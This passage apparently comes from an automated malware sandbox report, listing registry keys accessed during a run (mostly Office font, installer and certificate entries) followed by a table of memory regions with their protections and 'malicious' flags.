HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\72F89
72F89
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\72F89
72F89
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 463 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
30C0000
heap
page read and write
malicious
3EE1000
trusted library allocation
page read and write
malicious
411D000
trusted library allocation
page read and write
malicious
3F3D000
trusted library allocation
page read and write
malicious
3060000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
3374000
trusted library allocation
page read and write
malicious
2F08000
heap
page read and write
malicious
30C1000
trusted library allocation
page read and write
malicious
2E7F000
trusted library allocation
page read and write
malicious
2D90000
heap
page read and write
malicious
2F00000
heap
page read and write
malicious
1035000
heap
page read and write
4D70000
trusted library allocation
page read and write
3F30000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
48CC000
trusted library allocation
page read and write
7FA70000
trusted library allocation
page execute and read and write
8C30000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
8C10000
trusted library allocation
page read and write
4A60000
heap
page read and write
8775000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
1054000
heap
page read and write
6150000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
E75000
heap
page read and write
2767000
heap
page read and write
79E0000
unkown
page read and write
8B50000
trusted library allocation
page read and write
6D41000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
4BA7000
trusted library allocation
page read and write
79E5000
unkown
page read and write
5270000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5C1D000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A80000
trusted library allocation
page read and write
8963000
trusted library allocation
page read and write
6C61000
heap
page read and write
6C00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
53E6000
heap
page read and write
98F0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C36000
trusted library allocation
page read and write
E90000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
5401000
heap
page read and write
8D60000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
695D000
trusted library allocation
page read and write
6490000
trusted library allocation
page read and write
7B8A000
stack
page read and write
5C2A000
trusted library allocation
page read and write
8A02000
trusted library allocation
page read and write
6C61000
heap
page read and write
7950000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8950000
unkown
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8775000
trusted library allocation
page read and write
6190000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8C10000
unkown
page read and write
540D000
heap
page read and write
8D50000
trusted library allocation
page read and write
8950000
unkown
page read and write
26BD000
stack
page read and write
54E0000
trusted library allocation
page read and write
61A6000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
546C000
heap
page read and write
8D60000
trusted library allocation
page read and write
4E50000
heap
page read and write
5C44000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
4BFF000
trusted library allocation
page read and write
4225000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
13F0000
heap
page read and write
8870000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
2E1E000
stack
page read and write
54F0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
29404400000
heap
page read and write
5C2E000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6C61000
heap
page read and write
8C50000
trusted library allocation
page read and write
6D31000
trusted library allocation
page read and write
6E24000
trusted library allocation
page read and write
69B0000
trusted library allocation
page read and write
9FD0000
trusted library allocation
page read and write
900000
heap
page read and write
8A10000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8820000
trusted library allocation
page read and write
8E26000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
87BA000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
5240000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
77F6000
unkown
page read and write
5B50000
trusted library allocation
page read and write
67BD000
stack
page read and write
7300000
direct allocation
page read and write
6D30000
trusted library allocation
page read and write
53F9000
heap
page read and write
6D40000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
5B70000
trusted library allocation
page execute and read and write
5C45000
trusted library allocation
page read and write
29404350000
heap
page read and write
79F0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
6480000
trusted library allocation
page read and write
4389000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
130B000
heap
page read and write
8F60000
remote allocation
page read and write
5B50000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
760A000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6CC0000
direct allocation
page read and write
8A00000
trusted library allocation
page read and write
7990000
unkown
page read and write
8856000
trusted library allocation
page read and write
8B40000
trusted library allocation
page read and write
79A5000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
8A00000
trusted library allocation
page execute and read and write
6C61000
heap
page read and write
6940000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EC0000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D30000
trusted library allocation
page execute and read and write
6C61000
heap
page read and write
5C1C000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
4D80000
remote allocation
page read and write
71F2000
direct allocation
page read and write
8B20000
trusted library allocation
page read and write
5C36000
trusted library allocation
page read and write
79E5000
trusted library allocation
page read and write
5358000
heap
page read and write
6C78000
trusted library allocation
page read and write
106F000
heap
page read and write
5C2B000
trusted library allocation
page read and write
5401000
heap
page read and write
4ED6000
heap
page read and write
79E0000
trusted library allocation
page read and write
4FC0000
heap
page read and write
9910000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
10C3000
heap
page read and write
8A80000
trusted library allocation
page read and write
4D02000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
538B000
heap
page read and write
8A80000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
CFD0000
trusted library allocation
page read and write
5C3E000
trusted library allocation
page read and write
545B000
heap
page read and write
79A0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
5C23000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
6AF0000
trusted library allocation
page execute and read and write
5C36000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
77F4000
unkown
page read and write
8BF7000
trusted library allocation
page read and write
A3DA77E000
stack
page read and write
6CE0000
direct allocation
page read and write
946C000
stack
page read and write
5C24000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
2E90000
trusted library allocation
page read and write
4F1E000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
87C2000
trusted library allocation
page read and write
E4E000
stack
page read and write
5C5D000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
1302000
trusted library allocation
page read and write
103F000
heap
page read and write
5C25000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
3F77000
trusted library allocation
page read and write
8CD7000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
4CCF000
trusted library allocation
page read and write
7B97000
trusted library allocation
page read and write
332D000
trusted library allocation
page read and write
2EC0000
trusted library allocation
page execute and read and write
5C5D000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
D0CF000
stack
page read and write
5C5D000
trusted library allocation
page read and write
4BDE000
stack
page read and write
5394000
heap
page read and write
5C2B000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
878C000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
1134000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
A3DA57E000
stack
page read and write
5220000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
306A000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A90000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8930000
trusted library allocation
page execute and read and write
8A00000
trusted library allocation
page read and write
4BBE000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
6D9E000
stack
page read and write
5B50000
trusted library allocation
page read and write
98D0000
trusted library section
page read and write
8D10000
unkown
page read and write
5C44000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8830000
unkown
page read and write
5C5D000
trusted library allocation
page read and write
5B10000
trusted library allocation
page execute and read and write
4BDD000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
8840000
unkown
page read and write
131B000
trusted library allocation
page execute and read and write
307D000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
8E86000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
109B000
heap
page read and write
8A80000
unkown
page read and write
2720000
heap
page read and write
8ED5000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5B80000
trusted library allocation
page read and write
5144000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
79A0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8820000
trusted library allocation
page read and write
4EBC000
heap
page read and write
5C5D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
5350000
heap
page read and write
98F0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
5C28000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
4E6A000
heap
page read and write
79A5000
trusted library allocation
page read and write
53C7000
heap
page read and write
8A00000
trusted library allocation
page read and write
8945000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
1057000
heap
page read and write
5C43000
trusted library allocation
page read and write
6C61000
heap
page read and write
5280000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8BC0000
trusted library allocation
page read and write
6C61000
heap
page read and write
1053000
heap
page read and write
8AC0000
trusted library allocation
page read and write
5240000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
124F000
heap
page read and write
1032000
heap
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
7990000
unkown
page read and write
4D20000
heap
page read and write
6C61000
heap
page read and write
8830000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
670000
heap
page read and write
6D40000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
3F29000
trusted library allocation
page read and write
6C61000
heap
page read and write
7995000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
8910000
unkown
page read and write
79A5000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
6D0E000
trusted library allocation
page read and write
107D000
heap
page read and write
A3DA27C000
stack
page read and write
7870000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8962000
trusted library allocation
page read and write
539C000
heap
page read and write
5550000
trusted library allocation
page read and write
589E000
stack
page read and write
61A0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
878C000
trusted library allocation
page read and write
5952000
direct allocation
page read and write
5C43000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D90000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
6C61000
heap
page read and write
7260000
heap
page read and write
5C43000
trusted library allocation
page read and write
FC3000
trusted library allocation
page read and write
8B50000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
E83000
trusted library allocation
page execute and read and write
8910000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
6C92000
direct allocation
page read and write
7990000
trusted library allocation
page read and write
5970000
direct allocation
page read and write
8910000
trusted library allocation
page read and write
6ED0000
trusted library allocation
page read and write
461F000
stack
page read and write
98E3000
trusted library allocation
page read and write
8ED6000
trusted library allocation
page read and write
8990000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C25000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
3368000
trusted library allocation
page read and write
5931000
direct allocation
page read and write
8D10000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
6C61000
heap
page read and write
497C000
stack
page read and write
5472000
heap
page read and write
79A5000
trusted library allocation
page read and write
6EA0000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
6C61000
heap
page read and write
10C5000
heap
page read and write
6D45000
trusted library allocation
page read and write
6C61000
heap
page read and write
79A0000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
7B97000
unkown
page read and write
8D60000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
5BE0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C5D000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6140000
trusted library allocation
page read and write
5290000
trusted library allocation
page read and write
8D70000
trusted library allocation
page execute and read and write
8950000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
F38000
stack
page read and write
5C5D000
trusted library allocation
page read and write
5C56000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
4D5D000
stack
page read and write
6C61000
heap
page read and write
8920000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
79A0000
